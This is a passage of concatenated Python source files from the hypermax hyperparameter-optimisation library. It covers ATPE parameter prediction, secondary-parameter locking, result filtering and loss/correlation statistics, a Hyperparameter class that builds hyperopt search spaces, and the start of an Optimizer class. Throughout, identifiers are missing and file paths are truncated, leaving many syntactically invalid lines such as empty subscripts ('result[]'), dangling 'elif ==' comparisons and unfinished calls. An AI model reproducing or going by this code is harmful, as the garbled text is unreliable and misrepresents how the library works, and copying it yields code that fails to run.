relevant elif atpeParamFeature == 'resultFilteringLossRankMultiplier' and atpeParams['resultFilteringMode'] != 'loss_rank': vector.append(-3) # This is the default value inserted when parameters aren't relevant elif atpeParamFeature == 'resultFilteringRandomProbability' and atpeParams['resultFilteringMode'] != 'random': vector.append(-3) # This is the default value inserted when parameters aren't relevant elif atpeParamFeature == 'secondaryCorrelationMultiplier' and atpeParams['secondaryProbabilityMode'] != 'correlation': vector.append(-3) # This is the default value inserted when parameters aren't relevant elif atpeParamFeature == 'secondaryFixedProbability' and atpeParams['secondaryProbabilityMode'] != 'fixed': vector.append(-3) # This is the default value inserted when parameters aren't relevant elif atpeParamFeature == 'secondaryTopLockingPercentile' and atpeParams['secondaryLockingMode'] != 'top': vector.append(-3) # This is the default value inserted when parameters aren't relevant elif atpeParamFeature in self.atpeParameterValues: for value in self.atpeParameterValues[atpeParamFeature]: vector.append(1.0 if atpeParams[atpeParamFeature] == value else 0) else: vector.append(float(atpeParams[atpeParamFeature])) allFeatureKeysForATPEParamModel = copy.copy(self.atpeModelFeatureKeys) for atpeParamFeature in atpeParamFeatures: if atpeParamFeature in self.atpeParameterValues: for value in self.atpeParameterValues[atpeParamFeature]: allFeatureKeysForATPEParamModel.append(atpeParamFeature + "_" + value) else: allFeatureKeysForATPEParamModel.append(atpeParamFeature) value = self.parameterModels[atpeParameter].predict([vector])[0] featureContributions = self.parameterModels[atpeParameter].predict([vector], pred_contrib=True)[0] atpeParamDetails[atpeParameter] = { "value": None, "reason": None } # Set the value if atpeParameter in self.atpeParameterValues: # Renormalize the predicted probabilities config = self.parameterModelConfigurations[atpeParameter] for atpeParamValueIndex, atpeParamValue in enumerate(self.atpeParameterValues[atpeParameter]): value[atpeParamValueIndex] = (((value[atpeParamValueIndex] - config['predMeans'][atpeParamValue]) / config['predStddevs'][atpeParamValue]) * config['origStddevs'][atpeParamValue]) + config['origMeans'][atpeParamValue] value[atpeParamValueIndex] = max(0.0, min(1.0, value[atpeParamValueIndex])) maxVal = numpy.max(value) for atpeParamValueIndex, atpeParamValue in enumerate(self.atpeParameterValues[atpeParameter]): value[atpeParamValueIndex] = max(value[atpeParamValueIndex], maxVal * 0.15) # We still allow the non reccomended modes to get chosen 15% of the time # Make a random weighted choice based on the normalized probabilities probabilities = value / numpy.sum(value) chosen = numpy.random.choice(a=self.atpeParameterValues[atpeParameter], p=probabilities) atpeParams[atpeParameter] = str(chosen) else: # Renormalize the predictions config = self.parameterModelConfigurations[atpeParameter] value = (((value - config['predMean']) / config['predStddev']) * config['origStddev']) + config['origMean'] atpeParams[atpeParameter] = float(value) atpeParamDetails[atpeParameter]["reason"] = {} # If we are predicting a class, we get separate feature contributions for each class. Take the average if atpeParameter in self.atpeParameterValues: featureContributions = numpy.mean( numpy.reshape(featureContributions, newshape=(len(allFeatureKeysForATPEParamModel) + 1, len(self.atpeParameterValues[atpeParameter]))), axis=1) contributions = [(self.atpeModelFeatureKeys[index], float(featureContributions[index])) for index in range(len(self.atpeModelFeatureKeys))] contributions = sorted(contributions, key=lambda r: -r[1]) # Only focus on the top 10% of features, since it gives more useful information. Otherwise the total gets really squashed out over many features, # because our model is highly regularized. contributions = contributions[:int(len(contributions) / 10)] total = numpy.sum([contrib[1] for contrib in contributions]) for contributionIndex, contribution in enumerate(contributions[:3]): atpeParamDetails[atpeParameter]['reason'][contribution[0]] = str(int(float(contribution[1]) * 100.0 / total)) + "%" # Apply bounds to all the parameters if atpeParameter == 'gamma': atpeParams['gamma'] = max(0.2, min(2.0, atpeParams['gamma'])) if atpeParameter == 'nEICandidates': atpeParams['nEICandidates'] = int(max(2.0, min(48, atpeParams['nEICandidates']))) if atpeParameter == 'resultFilteringAgeMultiplier': atpeParams['resultFilteringAgeMultiplier'] = max(1.0, min(4.0, atpeParams['resultFilteringAgeMultiplier'])) if atpeParameter == 'resultFilteringLossRankMultiplier': atpeParams['resultFilteringLossRankMultiplier'] = max(1.0, min(4.0, atpeParams['resultFilteringLossRankMultiplier'])) if atpeParameter == 'resultFilteringRandomProbability': atpeParams['resultFilteringRandomProbability'] = max(0.7, min(0.9, atpeParams['resultFilteringRandomProbability'])) if atpeParameter == 'secondaryCorrelationExponent': atpeParams['secondaryCorrelationExponent'] = max(1.0, min(3.0, atpeParams['secondaryCorrelationExponent'])) if atpeParameter == 'secondaryCorrelationMultiplier': atpeParams['secondaryCorrelationMultiplier'] = max(0.2, min(1.8, atpeParams['secondaryCorrelationMultiplier'])) if atpeParameter == 'secondaryCutoff': atpeParams['secondaryCutoff'] = max(-1.0, min(1.0, atpeParams['secondaryCutoff'])) if atpeParameter == 'secondaryFixedProbability': atpeParams['secondaryFixedProbability'] = max(0.2, min(0.8, atpeParams['secondaryFixedProbability'])) if atpeParameter == 'secondaryTopLockingPercentile': atpeParams['secondaryTopLockingPercentile'] = max(0, min(10.0, atpeParams['secondaryTopLockingPercentile'])) # Now blank out unneeded params so they don't confuse us if atpeParams['secondaryLockingMode'] == 'random': atpeParams['secondaryTopLockingPercentile'] = None if atpeParams['secondaryProbabilityMode'] == 'fixed': atpeParams['secondaryCorrelationMultiplier'] = None else: atpeParams['secondaryFixedProbability'] = None if atpeParams['resultFilteringMode'] == 'none': atpeParams['resultFilteringAgeMultiplier'] = None atpeParams['resultFilteringLossRankMultiplier'] = None atpeParams['resultFilteringRandomProbability'] = None elif atpeParams['resultFilteringMode'] == 'age': atpeParams['resultFilteringLossRankMultiplier'] = None atpeParams['resultFilteringRandomProbability'] = None elif atpeParams['resultFilteringMode'] == 'loss_rank': atpeParams['resultFilteringAgeMultiplier'] = None atpeParams['resultFilteringRandomProbability'] = None elif atpeParams['resultFilteringMode'] == 'random': atpeParams['resultFilteringAgeMultiplier'] = None atpeParams['resultFilteringLossRankMultiplier'] = None for atpeParameter in self.atpeParameters: if atpeParams[atpeParameter] is None: del atpeParamDetails[atpeParameter] else: atpeParamDetails[atpeParameter]['value'] = atpeParams[atpeParameter] self.lastATPEParameters = atpeParams self.atpeParamDetails = atpeParamDetails # pprint(atpeParams) def computePrimarySecondary(): if len(results) < initializationRounds: return parameters, [], [0.5] * len(parameters) # Put all parameters as primary if len(set(result['loss'] for result in results)) < 5: return parameters, [], [0.5] * len(parameters) # Put all parameters as primary numberParameters = [parameter for parameter in parameters if parameter.config['type'] == 'number'] otherParameters = [parameter for parameter in parameters if parameter.config['type'] != 'number'] totalWeight = 0 correlations = {} for parameter in numberParameters: if len(set(result[] for result in results if result[] is not None)) < 2: correlations[] = 0 else: values = [] valueLosses = [] for result in results: if result[] is not None and result['loss'] is not None: values.append(result[]) valueLosses.append(result['loss']) correlation = math.pow(abs(scipy.stats.spearmanr(values, valueLosses)[0]), atpeParams['secondaryCorrelationExponent']) correlations[] = correlation totalWeight += correlation threshold = totalWeight * abs(atpeParams['secondaryCutoff']) if atpeParams['secondaryCutoff'] < 0: # Reverse order - we lock in the highest correlated parameters sortedParameters = sorted(numberParameters, key=lambda parameter: correlations[]) else: # Normal order - sort properties by their correlation to lock in lowest correlated parameters sortedParameters = sorted(numberParameters, key=lambda parameter: -correlations[]) primaryParameters = [] secondaryParameters = [] cumulative = totalWeight for parameter in sortedParameters: if cumulative < threshold: secondaryParameters.append(parameter) else: primaryParameters.append(parameter) cumulative -= correlations[] return primaryParameters + otherParameters, secondaryParameters, correlations if len([result['loss'] for result in results if result['loss'] is not None]) == 0: maxLoss = 1 else: maxLoss = numpy.max([result['loss'] for result in results if result['loss'] is not None]) # We create a copy of lockedValues so we don't modify the object that was passed in as an argument - treat it as immutable. # The ATPE algorithm will lock additional values in a stochastic manner if lockedValues is None: lockedValues = {} else: lockedValues = copy.copy(lockedValues) filteredResults = [] removedResults = [] if len(results) > initializationRounds: primaryParameters, secondaryParameters, correlations = computePrimarySecondary() self.lastLockedParameters = [] sortedResults = list(sorted(list(results), key=lambda result: (result['loss'] if result['loss'] is not None else (maxLoss + 1)))) topResults = sortedResults if atpeParams['secondaryLockingMode'] == 'top': topResultsN = max(1, int(math.ceil(len(sortedResults) * atpeParams['secondaryTopLockingPercentile'] / 100.0))) topResults = sortedResults[:topResultsN] # Any secondary parameters have may be locked to either the current best value or any value within the result pool. for secondary in secondaryParameters: if atpeParams['secondaryProbabilityMode'] == 'fixed': if random.uniform(0, 1) < atpeParams['secondaryFixedProbability']: self.lastLockedParameters.append( if atpeParams['secondaryLockingMode'] == 'top': lockResult = random.choice(topResults) if lockResult[] is not None and lockResult[] != "": lockedValues[] = lockResult[] elif atpeParams['secondaryLockingMode'] == 'random': lockedValues[] = self.chooseRandomValueForParameter(secondary) elif atpeParams['secondaryProbabilityMode'] == 'correlation': probability = max(0, min(1, abs(correlations[]) * atpeParams['secondaryCorrelationMultiplier'])) if random.uniform(0, 1) < probability: self.lastLockedParameters.append( if atpeParams['secondaryLockingMode'] == 'top': lockResult = random.choice(topResults) if lockResult[] is not None and lockResult[] != "": lockedValues[] = lockResult[] elif atpeParams['secondaryLockingMode'] == 'random': lockedValues[] = self.chooseRandomValueForParameter(secondary) # Now last step, we filter results prior to sending them into ATPE for resultIndex, result in enumerate(results): if atpeParams['resultFilteringMode'] == 'none': filteredResults.append(result) elif atpeParams['resultFilteringMode'] == 'random': if random.uniform(0, 1) < atpeParams['resultFilteringRandomProbability']: filteredResults.append(result) else: removedResults.append(result) elif atpeParams['resultFilteringMode'] == 'age': age = float(resultIndex) / float(len(results)) if random.uniform(0, 1) < (atpeParams['resultFilteringAgeMultiplier'] * age): filteredResults.append(result) else: removedResults.append(result) elif atpeParams['resultFilteringMode'] == 'loss_rank': rank = 1.0 - (float(sortedResults.index(result)) / float(len(results))) if random.uniform(0, 1) < (atpeParams['resultFilteringLossRankMultiplier'] * rank): filteredResults.append(result) else: removedResults.append(result) # If we are in initialization, or by some other fluke of random nature that we end up with no results after filtering, # then just use all the results if len(filteredResults) == 0: filteredResults = results hyperopt.fmin(fn=sample, space=Hyperparameter(hyperparameterSpace).createHyperoptSpace(lockedValues), algo=functools.partial(hyperopt.tpe.suggest, n_startup_jobs=initializationRounds, gamma=atpeParams['gamma'], n_EI_candidates=int(atpeParams['nEICandidates'])), max_evals=1, trials=self.convertResultsToTrials(hyperparameterSpace, filteredResults), rstate=rstate, show_progressbar=False) return params def chooseRandomValueForParameter(self, parameter): if parameter.config.get('mode', 'uniform') == 'uniform': minVal = parameter.config['min'] maxVal = parameter.config['max'] if parameter.config.get('scaling', 'linear') == 'logarithmic': minVal = math.log(minVal) maxVal = math.log(maxVal) value = random.uniform(minVal, maxVal) if parameter.config.get('scaling', 'linear') == 'logarithmic': value = math.exp(value) if 'rounding' in parameter.config: value = round(value / parameter.config['rounding']) * parameter.config['rounding'] elif parameter.get('mode', 'uniform') == 'normal': meanVal = parameter.config['mean'] stddevVal = parameter.config['stddev'] if parameter.config.get('scaling', 'linear') == 'logarithmic': meanVal = math.log(meanVal) stddevVal = math.log(stddevVal) value = random.gauss(meanVal, stddevVal) if parameter.config.get('scaling', 'linear') == 'logarithmic': value = math.exp(value) if 'rounding' in parameter.config: value = round(value / parameter.config['rounding']) * parameter.config['rounding'] elif parameter.get('mode', 'uniform') == 'randint': max = parameter.config['max'] value = random.randint(0, max-1) return value def computePartialResultStatistics(self, hyperparameterSpace, results): losses = numpy.array(sorted([result['loss'] for result in results if result['loss'] is not None])) bestLoss = 0 percentile5Loss = 0 percentile25Loss = 0 percentile50Loss = 0 percentile75Loss = 0 statistics = {} numpy.warnings.filterwarnings('ignore') if len(set(losses)) > 1: bestLoss = numpy.percentile(losses, 0) percentile5Loss = numpy.percentile(losses, 5) percentile25Loss = numpy.percentile(losses, 25) percentile50Loss = numpy.percentile(losses, 50) percentile75Loss = numpy.percentile(losses, 75) statistics['loss_skew'] = scipy.stats.skew(losses) statistics['loss_kurtosis'] = scipy.stats.kurtosis(losses) else: statistics['loss_skew'] = 0 statistics['loss_kurtosis'] = 0 if percentile50Loss == 0: statistics['loss_stddev_median_ratio'] = 0 statistics['loss_best_percentile50_ratio'] = 0 else: statistics['loss_stddev_median_ratio'] = numpy.std(losses) / percentile50Loss statistics['loss_best_percentile50_ratio'] = bestLoss / percentile50Loss if bestLoss == 0: statistics['loss_stddev_best_ratio'] = 0 else: statistics['loss_stddev_best_ratio'] = numpy.std(losses) / bestLoss if percentile25Loss == 0: statistics['loss_best_percentile25_ratio'] = 0 statistics['loss_percentile5_percentile25_ratio'] = 0 else: statistics['loss_best_percentile25_ratio'] = bestLoss / percentile25Loss statistics['loss_percentile5_percentile25_ratio'] = percentile5Loss / percentile25Loss if percentile75Loss == 0: statistics['loss_best_percentile75_ratio'] = 0 else: statistics['loss_best_percentile75_ratio'] = bestLoss / percentile75Loss def getValue(result, parameter): return result[] # Now we compute correlations between each parameter and the loss parameters = Hyperparameter(hyperparameterSpace).getFlatParameters() correlations = [] for parameter in parameters: if parameter.config['type'] == 'number': if len(set(getValue(result, parameter) for result in results if (getValue(result, parameter) is not None and result['loss'] is not None))) < 2: correlations.append(0) else: values = [] valueLosses = [] for result in results: if result['loss'] is not None and (isinstance(getValue(result, parameter), float) or isinstance(getValue(result, parameter), int)): values.append(getValue(result, parameter)) valueLosses.append(result['loss']) correlation = abs(scipy.stats.spearmanr(values, valueLosses)[0]) if math.isnan(correlation) or math.isinf(correlation): correlations.append(0) else: correlations.append(correlation) correlations = numpy.array(correlations) if len(set(correlations)) == 1: statistics['correlation_skew'] = 0 statistics['correlation_kurtosis'] = 0 statistics['correlation_stddev_median_ratio'] = 0 statistics['correlation_stddev_best_ratio'] = 0 statistics['correlation_best_percentile25_ratio'] = 0 statistics['correlation_best_percentile50_ratio'] = 0 statistics['correlation_best_percentile75_ratio'] = 0 statistics['correlation_percentile5_percentile25_ratio'] = 0 else: bestCorrelation = numpy.percentile(correlations, 100) # Correlations are in the opposite order of losses, higher correlation is considered "best" percentile5Correlation = numpy.percentile(correlations, 95) percentile25Correlation = numpy.percentile(correlations, 75) percentile50Correlation = numpy.percentile(correlations, 50) percentile75Correlation = numpy.percentile(correlations, 25) statistics['correlation_skew'] = scipy.stats.skew(correlations) statistics['correlation_kurtosis'] = scipy.stats.kurtosis(correlations) if percentile50Correlation == 0: statistics['correlation_stddev_median_ratio'] = 0 statistics['correlation_best_percentile50_ratio'] = 0 else: statistics['correlation_stddev_median_ratio'] = numpy.std(correlations) / percentile50Correlation statistics['correlation_best_percentile50_ratio'] = bestCorrelation / percentile50Correlation if bestCorrelation == 0: statistics['correlation_stddev_best_ratio'] = 0 else: statistics['correlation_stddev_best_ratio'] = numpy.std(correlations) / bestCorrelation if percentile25Correlation == 0: statistics['correlation_best_percentile25_ratio'] = 0 statistics['correlation_percentile5_percentile25_ratio'] = 0 else: statistics['correlation_best_percentile25_ratio'] = bestCorrelation / percentile25Correlation statistics['correlation_percentile5_percentile25_ratio'] = percentile5Correlation / percentile25Correlation if percentile75Correlation == 0: statistics['correlation_best_percentile75_ratio'] = 0 else: statistics['correlation_best_percentile75_ratio'] = bestCorrelation / percentile75Correlation return statistics def computeAllResultStatistics(self, hyperparameterSpace, results): losses = numpy.array(sorted([result['loss'] for result in results if result['loss'] is not None])) if len(set(losses)) > 1: percentile10Loss = numpy.percentile(losses, 10) percentile20Loss = numpy.percentile(losses, 20) percentile30Loss = numpy.percentile(losses, 30) else: percentile10Loss = losses[0] percentile20Loss = losses[0] percentile30Loss = losses[0] allResults = list(results) percentile10Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile10Loss] percentile20Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile20Loss] percentile30Results = [result for result in results if result['loss'] is not None and result['loss'] <= percentile30Loss] recent10Count = min(len(results), 10) recent10Results = results[-recent10Count:] recent25Count = min(len(results), 25) recent25Results = results[-recent25Count:] recent15PercentCount = max(math.ceil(len(results) * 0.15), 5) recent15PercentResults = results[-recent15PercentCount:] statistics = {} allResultStatistics = self.computePartialResultStatistics(hyperparameterSpace, allResults) for stat, value in allResultStatistics.items(): statistics['all_' + stat] = value percentile10Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile10Results) for stat, value in percentile10Statistics.items(): statistics['top_10%_' + stat] = value percentile20Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile20Results) for stat, value in percentile20Statistics.items(): statistics['top_20%_' + stat] = value percentile30Statistics = self.computePartialResultStatistics(hyperparameterSpace, percentile30Results) for stat, value in percentile30Statistics.items(): statistics['top_30%_' + stat] = value recent10Statistics = self.computePartialResultStatistics(hyperparameterSpace, recent10Results) for stat, value in recent10Statistics.items(): statistics['recent_10_' + stat] = value recent25Statistics = self.computePartialResultStatistics(hyperparameterSpace, recent25Results) for stat, value in recent25Statistics.items(): statistics['recent_25_' + stat] = value recent15PercentResult = self.computePartialResultStatistics(hyperparameterSpace, recent15PercentResults) for stat, value in recent15PercentResult.items(): statistics['recent_15%_' + stat] = value # Although we have added lots of protection in the computePartialResultStatistics code, one last hedge against any NaN or infinity values coming up # in our statistics for key in statistics.keys(): if math.isnan(statistics[key]) or math.isinf(statistics[key]): statistics[key] = 0 return statistics ``` #### File: hypermax/hypermax/ ```python from contextlib import contextmanager import tempfile import os # Windows doesn't support opening a NamedTemporaryFile. # Solution inspired in @contextmanager def ClosedNamedTempFile(contents): try: with tempfile.NamedTemporaryFile(delete=False) as f: file_name = f.write(contents) yield file_name finally: os.unlink(file_name) ``` #### File: hypermax/hypermax/ ```python from hyperopt import hp import math from pprint import pprint import re class Hyperparameter: """ This class represents a hyperparameter.""" def __init__(self, config, parent=None, root='root'): self.config = config self.root = root = root[5:] self.parent = parent self.resultVariableName = re.sub("\\.\\d+\\.", ".", self.hyperoptVariableName = self.root if 'name' in config: self.hyperoptVariableName = config['name'] def createHyperoptSpace(self, lockedValues=None): name = self.root if lockedValues is None: lockedValues = {} if 'anyOf' in self.config or 'oneOf' in self.config: data = [] if 'anyOf' in self.config: data = self.config['anyOf'] else: data = self.config['oneOf'] subSpaces = [Hyperparameter(param, self, name + "." + str(index)).createHyperoptSpace(lockedValues) for index, param in enumerate(data)] for index, space in enumerate(subSpaces): space["$index"] = index choices = hp.choice(self.hyperoptVariableName, subSpaces) return choices elif 'enum' in self.config: if in lockedValues: return lockedValues[] choices = hp.choice(self.hyperoptVariableName, self.config['enum']) return choices elif 'constant' in self.config: if in lockedValues: return lockedValues[] return self.config['constant'] elif self.config['type'] == 'object': space = {} for key in self.config['properties'].keys(): config = self.config['properties'][key] space[key] = Hyperparameter(config, self, name + "." + key).createHyperoptSpace(lockedValues) return space elif self.config['type'] == 'number': if in lockedValues: return lockedValues[] mode = self.config.get('mode', 'uniform') scaling = self.config.get('scaling', 'linear') if mode == 'uniform': min = self.config.get('min', 0) max = self.config.get('max', 1) rounding = self.config.get('rounding', None) if scaling == 'linear': if rounding is not None: return hp.quniform(self.hyperoptVariableName, min, max, rounding) else: return hp.uniform(self.hyperoptVariableName, min, max) elif scaling == 'logarithmic': if rounding is not None: return hp.qloguniform(self.hyperoptVariableName, math.log(min), math.log(max), rounding) else: return hp.loguniform(self.hyperoptVariableName, math.log(min), math.log(max)) if mode == 'randint': max = self.config.get('max', 1) return hp.randint(self.hyperoptVariableName, max) if mode == 'normal': mean = self.config.get('mean', 0) stddev = self.config.get('stddev', 1) rounding = self.config.get('rounding', None) if scaling == 'linear': if rounding is not None: return hp.qnormal(self.hyperoptVariableName, mean, stddev, rounding) else: return hp.normal(self.hyperoptVariableName, mean, stddev) elif scaling == 'logarithmic': if rounding is not None: return hp.qlognormal(self.hyperoptVariableName, math.log(mean), math.log(stddev), rounding) else: return hp.lognormal(self.hyperoptVariableName, math.log(mean), math.log(stddev)) def getFlatParameterNames(self): name = self.root if 'anyOf' in self.config or 'oneOf' in self.config: keys = set() if 'anyOf' in self.config: data = self.config['anyOf'] else: data = self.config['oneOf'] for index, param in enumerate(data): subKeys = Hyperparameter(param, self, name + "." + str(index)).getFlatParameterNames() for key in subKeys: keys.add(key) return keys elif 'enum' in self.config or 'constant' in self.config: return [name] elif self.config['type'] == 'object': keys = set() for key in self.config['properties'].keys(): config = self.config['properties'][key] subKeys = Hyperparameter(config, self, name + "." + key).getFlatParameterNames() for key in subKeys: keys.add(key) return keys elif self.config['type'] == 'number': return [name] def getFlatParameters(self): name = self.root if 'anyOf' in self.config or 'oneOf' in self.config: parameters = [] if 'anyOf' in self.config: data = self.config['anyOf'] else: data = self.config['oneOf'] for index, param in enumerate(data): subParameters = Hyperparameter(param, self, name + "." + str(index)).getFlatParameters() parameters = parameters + subParameters return parameters elif 'enum' in self.config or 'constant' in self.config: return [self] elif self.config['type'] == 'object': parameters = [] for key in self.config['properties'].keys(): config = self.config['properties'][key] subParameters = Hyperparameter(config, self, name + "." + key).getFlatParameters() parameters = parameters + subParameters return parameters elif self.config['type'] == 'number': return [self] def getLog10Cardinality(self): if 'anyOf' in self.config or 'oneOf' in self.config: if 'anyOf' in self.config: data = self.config['anyOf'] else: data = self.config['oneOf'] log10_cardinality = Hyperparameter(data[0], self, self.root + ".0").getLog10Cardinality() for index, subParam in enumerate(data[1:]): # We used logarithm identities to create this reduction formula other_log10_cardinality = Hyperparameter(subParam, self, self.root + "." + str(index)).getLog10Cardinality() # Revert to linear at high and low values, for numerical stability. Check here: to observe if (log10_cardinality - other_log10_cardinality) > 3: log10_cardinality = log10_cardinality + 1 elif (other_log10_cardinality - log10_cardinality) > 3: log10_cardinality = other_log10_cardinality + 1 else: log10_cardinality = other_log10_cardinality + math.log10(1 + math.pow(10, log10_cardinality - other_log10_cardinality)) return log10_cardinality + math.log10(len(data)) elif 'enum' in self.config: return math.log10(len(self.config['enum'])) elif 'constant' in self.config: return math.log10(1) elif self.config['type'] == 'object': log10_cardinality = 0 for index, subParam in enumerate(self.config['properties'].values()): subParameter = Hyperparameter(subParam, self, self.root + "." + str(index)) log10_cardinality += subParameter.getLog10Cardinality() return log10_cardinality elif self.config['type'] == 'number': if 'rounding' in self.config: return math.log10(min(20, (self.config['max'] - self.config['min']) / self.config['rounding'] + 1)) else: return math.log10(20) # Default of 20 for fully uniform numbers. def convertToFlatValues(self, params): flatParams = {} def recurse(key, value, root): result_key = root + "." + key if isinstance(value, str): flatParams[result_key[1:]] = value elif isinstance(value, float) or isinstance(value, bool) or isinstance(value, int): flatParams[result_key[1:]] = value elif isinstance(value, dict): for subkey, subvalue in value.items(): recurse(subkey, subvalue, result_key) for key in params.keys(): value = params[key] recurse(key, value, '') flatValues = {} if 'anyOf' in self.config or 'oneOf' in self.config: if 'anyOf' in self.config: data = self.config['anyOf'] else: data = self.config['oneOf'] subParameterIndex = flatParams[self.resultVariableName + '.$index'] flatValues[] = subParameterIndex for index, param in enumerate(data): subParameter = Hyperparameter(param, self, self.root + "." + str(index)) if index == subParameterIndex: subFlatValues = subParameter.convertToFlatValues(flatParams) for key in subFlatValues: flatValues[key] = subFlatValues[key] else: for flatParam in subParameter.getFlatParameters(): flatValues[] = "" return flatValues elif 'constant' in self.config: flatValues[] = flatParams[self.resultVariableName] return flatValues elif 'enum' in self.config: flatValues[] = flatParams[self.resultVariableName] return flatValues elif self.config['type'] == 'object': for key in self.config['properties'].keys(): config = self.config['properties'][key] subFlatValues = Hyperparameter(config, self, self.root + "." + key).convertToFlatValues(flatParams) for key in subFlatValues: flatValues[key] = subFlatValues[key] if == "": for key in params.keys(): if key.startswith("$"): flatValues[key] = params[key] return flatValues elif self.config['type'] == 'number': flatValues[] = flatParams[self.resultVariableName] return flatValues def convertToStructuredValues(self, flatValues): if 'anyOf' in self.config or 'oneOf' in self.config: if 'anyOf' in self.config: data = self.config['anyOf'] else: data = self.config['oneOf'] subParameterIndex = flatValues[] subParam = Hyperparameter(data[subParameterIndex], self, self.root + "." + str(subParameterIndex)) structured = subParam.convertToStructuredValues(flatValues) structured['$index'] = subParameterIndex return structured elif 'constant' in self.config: return flatValues[] elif 'enum' in self.config: return flatValues[] elif self.config['type'] == 'object': result = {} for key in self.config['properties'].keys(): config = self.config['properties'][key] subStructuredValue = Hyperparameter(config, self, self.root + "." + key).convertToStructuredValues(flatValues) result[key] = subStructuredValue if == "": for key in flatValues.keys(): if key.startswith("$"): result[key] = flatValues[key] return result elif self.config['type'] == 'number': return flatValues[] @staticmethod def createHyperparameterConfigForHyperoptDomain(domain): if is None: data = { "type": "object", "properties": {} } for key in domain.params: data['properties'][key] = Hyperparameter.createHyperparameterConfigForHyperoptDomain(domain.params[key]) if 'name' not in data['properties'][key]: data['properties'][key]['name'] = key return data elif == 'dict': data = { "type": "object", "properties": {} } for item in domain.named_args: data['properties'][item[0]] = Hyperparameter.createHyperparameterConfigForHyperoptDomain(item[1]) return data elif == 'switch': data = { "oneOf": [ ] } data['name'] = domain.pos_args[0].pos_args for item in domain.pos_args[1:]: data['oneOf'].append(Hyperparameter.createHyperparameterConfigForHyperoptDomain(item)) return data elif == 'hyperopt_param': data = Hyperparameter.createHyperparameterConfigForHyperoptDomain(domain.pos_args[1]) data['name'] = domain.pos_args[0]._obj return data elif == 'uniform': data = {"type": "number"} data['scaling'] = 'linear' data['mode'] = 'uniform' data['min'] = domain.pos_args[0]._obj data['max'] = domain.pos_args[1]._obj return data elif == 'quniform': data = {"type": "number"} data['scaling'] = 'linear' data['mode'] = 'uniform' data['min'] = domain.pos_args[0]._obj data['max'] = domain.pos_args[1]._obj data['rounding'] = domain.pos_args[2]._obj return data elif == 'loguniform': data = {"type": "number"} data['scaling'] = 'logarithmic' data['mode'] = 'uniform' data['min'] = math.exp(domain.pos_args[0]._obj) data['max'] = math.exp(domain.pos_args[1]._obj) return data elif == 'qloguniform': data = {"type": "number"} data['scaling'] = 'logarithmic' data['mode'] = 'uniform' data['min'] = math.exp(domain.pos_args[0]._obj) data['max'] = math.exp(domain.pos_args[1]._obj) data['rounding'] = domain.pos_args[2]._obj return data elif == 'normal': data = {"type": "number"} data['scaling'] = 'linear' data['mode'] = 'normal' data['mean'] = domain.pos_args[0]._obj data['stddev'] = domain.pos_args[1]._obj return data elif == 'qnormal': data = {"type": "number"} data['scaling'] = 'linear' data['mode'] = 'normal' data['mean'] = domain.pos_args[0]._obj data['stddev'] = domain.pos_args[1]._obj data['rounding'] = domain.pos_args[2]._obj return data elif == 'lognormal': data = {"type": "number"} data['scaling'] = 'logarithmic' data['mode'] = 'normal' data['mean'] = domain.pos_args[0]._obj data['stddev'] = domain.pos_args[1]._obj return data elif == 'qlognormal': data = {"type": "number"} data['scaling'] = 'logarithmic' data['mode'] = 'normal' data['mean'] = domain.pos_args[0]._obj data['stddev'] = domain.pos_args[1]._obj data['rounding'] = domain.pos_args[2]._obj return data elif == 'literal': data = { 'type': 'string', 'constant': domain._obj } return data elif == 'randint': data = {"type": "number"} max = domain.pos_args[0]._obj data['max'] = max data['mode'] = 'randint' return data else: raise ValueError(f"Unsupported hyperopt domain type {}") ``` #### File: hypermax/hypermax/ ```python import hyperopt import csv import json import traceback import os.path from pprint import pprint import datetime import time import numpy.random import threading import queue import copy import tempfile import random import subprocess import concurrent.futures import tempfile import functools import math import atexit import jsonschema import pkg_resources from hypermax.execution import Execution from hypermax.hyperparameter import Hyperparameter from hypermax.results_analyzer import ResultsAnalyzer from hypermax.algorithms.atpe_optimizer import ATPEOptimizer from hypermax.algorithms.human_guided_optimizer_wrapper import HumanGuidedOptimizerWrapper from hypermax.algorithms.tpe_optimizer import TPEOptimizer from hypermax.algorithms.random_search_optimizer import RandomSearchOptimizer from hypermax.algorithms.adaptive_bayesian_hyperband_optimizer import AdaptiveBayesianHyperband from hypermax.configuration import Configuration class Optimizer: resultInformationKeys = [ 'trial', 'status', 'loss', 'time', 'log', 'error' ] def __init__(self, configuration): self.config = Configuration(configuration) self.searchConfig = configuration.get('search', {}) # jsonschema.validate(self.searchConfig, self.configurationSchema()) = self.config.createHyperparameterSpace() self.threadExecutor = concurrent.futures.ThreadPoolExecutor() self.resultsAnalyzer = ResultsAnalyzer(configuration) self.results = [] self.resultFutures = [] = None self.bestLoss = None self.thread = threading.Thread(target=lambda: self.optimizationThread(), daemon=True if configuration.get("ui", {}).get("enabled", True) else False) self.totalTrials = self.searchConfig.get("iterations") self.trialsSinceResultsUpload = None self.resultsExportFuture = None self.currentTrials = [] self.allWorkers = set(range(['function'].get('parallel', 1))) self.occupiedWorkers = set() self.trialNumber = 0 self.lastATPEParameters = None self.lastLockedParameters = None self.atpeParamDetails = None self.tpeOptimizer = TPEOptimizer() self.atpeOptimizer = ATPEOptimizer() self.abhOptimizer = AdaptiveBayesianHyperband(self.atpeOptimizer, self.searchConfig.get("min_budget", 1), self.searchConfig.get("max_budget", 100), self.searchConfig.get("eta", 3)) self.humanGuidedATPEOptimizer = HumanGuidedOptimizerWrapper(self.atpeOptimizer) self.randomSearchOptimizer = RandomSearchOptimizer() def __del__(self): if self.threadExecutor: self.threadExecutor.shutdown(wait=True) @classmethod def configurationSchema(self): """ This method returns the configuration schema for the optimization module. The schema is a standard JSON-schema object.""" return { "type": "object", "properties": { "method": {"type": "string", "enum": ['atpe', 'tpe', 'random']}, "iterations": {"type": "number"}, "budget": {"type": "number"} }, "required": ['method', 'iterations'] } def completed(self): return len(self.results) def sampleNext(self): if self.searchConfig['method'] == 'tpe': return self.tpeOptimizer.recommendNextParameters(['hyperparameters'], self.results, self.currentTrials) elif self.searchConfig['method'] == 'random': return self.randomSearchOptimizer.recommendNextParameters(['hyperparameters'], self.results, self.currentTrials) elif self.searchConfig['method'] == 'atpe': params = self.humanGuidedATPEOptimizer.recommendNextParameters(['hyperparameters'], self.results, self.currentTrials) self.lastATPEParameters = self.atpeOptimizer.lastATPEParameters self.lastLockedParameters = self.atpeOptimizer.lastLockedParameters self.atpeParamDetails = self.atpeOptimizer.atpeParamDetails return params elif 